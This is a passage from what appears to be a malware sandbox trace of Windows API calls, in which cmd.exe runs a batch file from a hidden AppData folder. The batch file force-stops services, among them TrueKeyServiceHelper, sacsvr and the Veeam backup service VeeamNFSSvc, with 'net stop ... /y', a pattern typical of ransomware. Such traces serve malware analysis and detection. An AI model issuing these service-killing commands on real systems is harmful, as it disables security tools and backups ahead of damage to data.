dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0040.865] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0040.865] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0040.865] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0040.865] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop TrueKeyServiceHelper /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop TrueKeyServiceHelper /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop TrueKeyServiceHelper /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x7a4, dwThreadId=0x824)) returned 1 [0040.868] CloseHandle (hObject=0x78) returned 1 [0040.868] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0040.868] GetProcessHeap () returned 0x3e0000 [0040.869] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0040.869] GetEnvironmentStringsW () returned 0x3f8408* [0040.869] GetProcessHeap () returned 0x3e0000 [0040.869] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0040.869] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0040.869] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0041.107] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0041.123] CloseHandle (hObject=0x74) returned 1 [0041.130] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0041.133] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0041.133] GetProcessHeap () returned 0x3e0000 [0041.133] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.133] GetEnvironmentStringsW () returned 0x3f8408* [0041.134] GetProcessHeap () returned 0x3e0000 [0041.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.134] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.134] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0041.134] GetProcessHeap () returned 0x3e0000 [0041.134] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.134] GetEnvironmentStringsW () returned 0x3f8408* [0041.134] GetProcessHeap () returned 0x3e0000 [0041.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.134] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.134] GetProcessHeap () returned 0x3e0000 [0041.134] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0041.134] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0041.134] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.134] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0041.134] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.134] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0041.134] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.134] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0041.135] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.135] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0041.135] SetConsoleInputExeNameW () returned 0x1 [0041.135] GetConsoleOutputCP () returned 0x1b5 [0041.135] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0041.135] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0041.135] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0041.135] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.135] SetFilePointer (in: hFile=0x74, lDistanceToMove=1561, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x619 [0041.135] GetProcessHeap () returned 0x3e0000 [0041.135] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0041.135] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0041.136] GetProcessHeap () returned 0x3e0000 [0041.136] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0041.136] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.136] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x619 [0041.136] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x12a8, lpOverlapped=0x0) returned 1 [0041.136] SetFilePointer (in: hFile=0x74, lDistanceToMove=1581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62d [0041.136] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=20, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop sacsvr /y\r\niceHelper /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 20 [0041.136] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.136] GetFileType (hFile=0x74) returned 0x1 [0041.136] _get_osfhandle (_FileHandle=3) returned 0x74 [0041.137] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62d [0041.137] GetProcessHeap () returned 0x3e0000 [0041.137] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0041.137] GetProcessHeap () returned 0x3e0000 [0041.137] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0041.137] _tell (_FileHandle=3) returned 1581 [0041.137] _close (_FileHandle=3) returned 0 [0041.137] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0041.137] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0041.137] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0041.137] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0041.137] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0041.137] _wcsicmp (_String1="net", _String2="CD") returned 11 [0041.137] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0041.137] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0041.137] _wcsicmp (_String1="net", _String2="REN") returned -4 [0041.137] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0041.138] _wcsicmp (_String1="net", _String2="SET") returned -5 [0041.138] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0041.138] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0041.138] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0041.138] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0041.138] _wcsicmp (_String1="net", _String2="MD") returned 1 [0041.138] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0041.138] _wcsicmp (_String1="net", _String2="RD") returned -4 [0041.138] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0041.138] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0041.138] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0041.138] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0041.138] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0041.138] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0041.138] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0041.138] _wcsicmp (_String1="net", _String2="VER") returned -8 [0041.138] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0041.138] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0041.138] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0041.138] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0041.138] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0041.138] _wcsicmp (_String1="net", _String2="START") returned -5 [0041.138] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0041.138] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0041.138] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0041.138] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0041.138] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0041.138] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0041.138] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0041.138] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0041.138] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0041.138] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0041.139] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.139] GetProcessHeap () returned 0x3e0000 [0041.139] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0041.139] GetProcessHeap () returned 0x3e0000 [0041.139] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0041.139] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.139] GetLastError () returned 0x2 [0041.139] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.139] GetLastError () returned 0x2 [0041.139] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.139] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.139] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0041.139] GetLastError () returned 0x2 [0041.140] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0041.140] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.140] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.140] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0041.140] GetProcessHeap () returned 0x3e0000 [0041.140] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0041.140] GetProcessHeap () returned 0x3e0000 [0041.140] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0041.140] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.140] GetLastError () returned 0x2 [0041.140] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.140] GetLastError () returned 0x2 [0041.140] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0041.141] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.141] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.141] GetLastError () returned 0x2 [0041.141] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0041.141] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0041.141] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.141] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0041.141] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0041.141] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0041.141] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.141] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop sacsvr /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop sacsvr /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop sacsvr /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x7cc, dwThreadId=0x644)) returned 1 [0041.145] CloseHandle (hObject=0x74) returned 1 [0041.145] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.145] GetProcessHeap () returned 0x3e0000 [0041.145] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.145] GetEnvironmentStringsW () returned 0x3f8408* [0041.145] GetProcessHeap () returned 0x3e0000 [0041.145] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.145] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.145] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0041.397] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0041.397] CloseHandle (hObject=0x78) returned 1 [0041.397] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0041.397] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0041.397] GetProcessHeap () returned 0x3e0000 [0041.397] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.397] GetEnvironmentStringsW () returned 0x3f8408* [0041.405] GetProcessHeap () returned 0x3e0000 [0041.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.405] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.405] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0041.405] GetProcessHeap () returned 0x3e0000 [0041.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.405] GetEnvironmentStringsW () returned 0x3f8408* [0041.405] GetProcessHeap () returned 0x3e0000 [0041.405] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.405] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.405] GetProcessHeap () returned 0x3e0000 [0041.405] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0041.405] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0041.405] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.405] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0041.405] _get_osfhandle (_FileHandle=1) returned 0x264 [0041.405] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0041.405] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.406] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0041.406] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0041.406] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0041.406] SetConsoleInputExeNameW () returned 0x1 [0041.406] GetConsoleOutputCP () returned 0x1b5 [0041.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0041.406] SetThreadUILanguage (LangId=0x0) returned 0x409 [0041.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0041.406] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0041.407] _get_osfhandle (_FileHandle=3) returned 0x78 [0041.407] SetFilePointer (in: hFile=0x78, lDistanceToMove=1581, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62d [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0041.407] GetProcessHeap () returned 0x3e0000 [0041.407] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0041.407] _get_osfhandle (_FileHandle=3) returned 0x78 [0041.407] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62d [0041.407] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1294, lpOverlapped=0x0) returned 1 [0041.407] SetFilePointer (in: hFile=0x78, lDistanceToMove=1606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x646 [0041.408] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamNFSSvc /y\r\nlper /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 25 [0041.408] _get_osfhandle (_FileHandle=3) returned 0x78 [0041.408] GetFileType (hFile=0x78) returned 0x1 [0041.408] _get_osfhandle (_FileHandle=3) returned 0x78 [0041.408] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x646 [0041.408] GetProcessHeap () returned 0x3e0000 [0041.408] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0041.408] GetProcessHeap () returned 0x3e0000 [0041.408] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0041.408] _tell (_FileHandle=3) returned 1606 [0041.408] _close (_FileHandle=3) returned 0 [0041.408] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0041.408] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0041.408] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0041.408] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0041.408] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0041.409] _wcsicmp (_String1="net", _String2="CD") returned 11 [0041.409] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0041.409] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0041.409] _wcsicmp (_String1="net", _String2="REN") returned -4 [0041.409] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0041.409] _wcsicmp (_String1="net", _String2="SET") returned -5 [0041.409] _wcsicmp (_String1="net", 